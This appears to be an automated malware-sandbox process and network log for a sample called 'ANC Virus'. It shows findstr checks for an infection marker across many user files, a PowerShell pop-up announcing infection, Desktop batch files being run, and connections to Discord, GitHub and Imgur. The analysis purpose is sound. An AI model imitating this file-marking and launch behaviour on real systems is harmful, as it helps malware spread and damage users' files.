findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResizeInitialize.xlsx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResolveSuspend.dot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResumeJoin.csv"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RevokeRead.vdw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SaveDebug.odt"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SearchExport.vsdm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SearchStop.vsdm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SetSync.odp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ShowStop.vdx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SkipExport.pptx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SkipRestore.pdf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\StepConnect.mht"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SuspendUnprotect.txt"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UndoInitialize.xlsb"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UninstallGet.txt"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UnpublishLock.pptm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\WriteLimit.ods"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\Quick Notes.one"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Quick Notes.one"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\CloseNew.rm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\CopyImport.ADTS"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DebugSend.cab"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DebugSplit.rtf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DenyWait.xml"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\FindCompress.xht"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\LimitExit.mht"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\NewBlock.mpeg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\NewPublish.temp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\ReceiveRedo.ico"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\RegisterDismount.kix"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\RequestClose.ttc"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\ResetExpand.jfif"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\SearchClear.wma"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\SearchMerge.xla"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\StepShow.html"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\UnblockCheckpoint.ico"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\UnregisterProtect.ram"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\BackupDismount.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\BackupUndo.emf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ClearLock.cr2"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ClearMount.dib"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\CompleteUnprotect.dxf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\CompressSkip.dib"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertFromExport.jpg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertFromSkip.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertToNew.raw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\DebugMerge.dib"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\EditSubmit.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\EnterRename.tiff"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ExportOut.wmf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ExportUninstall.gif"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\GetLimit.emf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\GroupRevoke.emz"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\InstallResize.wmf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\LockDisconnect.raw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\MoveDismount.raw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\My Wallpaper.jpg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\PushHide.emz"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\RemoveCompare.tiff"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\RepairUnregister.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ResolveWrite.bmp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SaveOpen.emz"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SearchInvoke.png"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\StartEnter.raw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\StepUninstall.jpeg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SubmitResolve.png"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SuspendShow.bmp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\TestRestart.svg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UndoSkip.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UninstallClear.dwg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UninstallResolve.svg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\AssertPush.zip"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\AssertUndo.au3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ClearSuspend.ppsm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ClearWait.mp3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\CompareRepair.xltx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConfirmCopy.svg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConnectInstall.mp3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConnectLimit.tiff"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConvertToOpen.fon"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\DisconnectDisable.zip"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\EditOut.xml"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExitOpen.vsdx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExpandAdd.aiff"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExportConvertTo.clr"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\GetUninstall.xltm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\GroupExport.snd"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\LockApprove.asf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MountEnter.css"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MountResolve.wax"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MoveHide.mid"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\PushWrite.wmv"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ReadSkip.m1v"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ReceiveWatch.php"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\RepairResize.html"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SaveDeny.jpg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SearchBlock.mp2v"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SearchStart.png"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SendDismount.emf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SetConvert.asp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SplitCopy.xml"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SwitchDisconnect.jpg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SwitchStop.ps1"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\UndoInitialize.ppsm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\UnregisterWatch.i64"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\WaitPublish.xht"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "[reflection.assembly]::LoadWithPartialName('System.Windows.Forms')|out-null;[windows.forms.messagebox]::Show('Infected with ANC Virus')"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\UnregisterStop.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\StepGrant.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ResizeUnlock.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ProtectLimit.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ConvertFromPing.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ClearLimit.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\PingShow.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ResizeClose.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f8,0x7fffd42cf208,0x7fffd42cf214,0x7fffd42cf220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1832,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2236,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2552,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=2568 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=3644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3452,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=3728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4968,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5032,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4992,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6156,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6192,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6156,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
cookie_exporter.exe --cookie-json=1140
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6452,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6468,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x250,0x7fffd42cf208,0x7fffd42cf214,0x7fffd42cf220
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1792,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2232,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3552,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4368,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4368,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4576,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4692,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4648,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=4624 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=5056 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5420,i,16797470560703503569,13940456891653296744,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 199.232.196.193:443 | i.imgur.com | tcp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 204.79.197.203:443 | ntp.msn.com | tcp |
| US | 204.79.197.203:443 | ntp.msn.com | tcp |
| US | 13.107.253.64:443 | api.edgeoffer.microsoft.com | tcp |
| IE | 95.100.98.123:443 | copilot.microsoft.com | tcp |
| US | 204.79.197.203:443 | ntp.msn.com | tcp |
| IE | 95.100.98.123:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
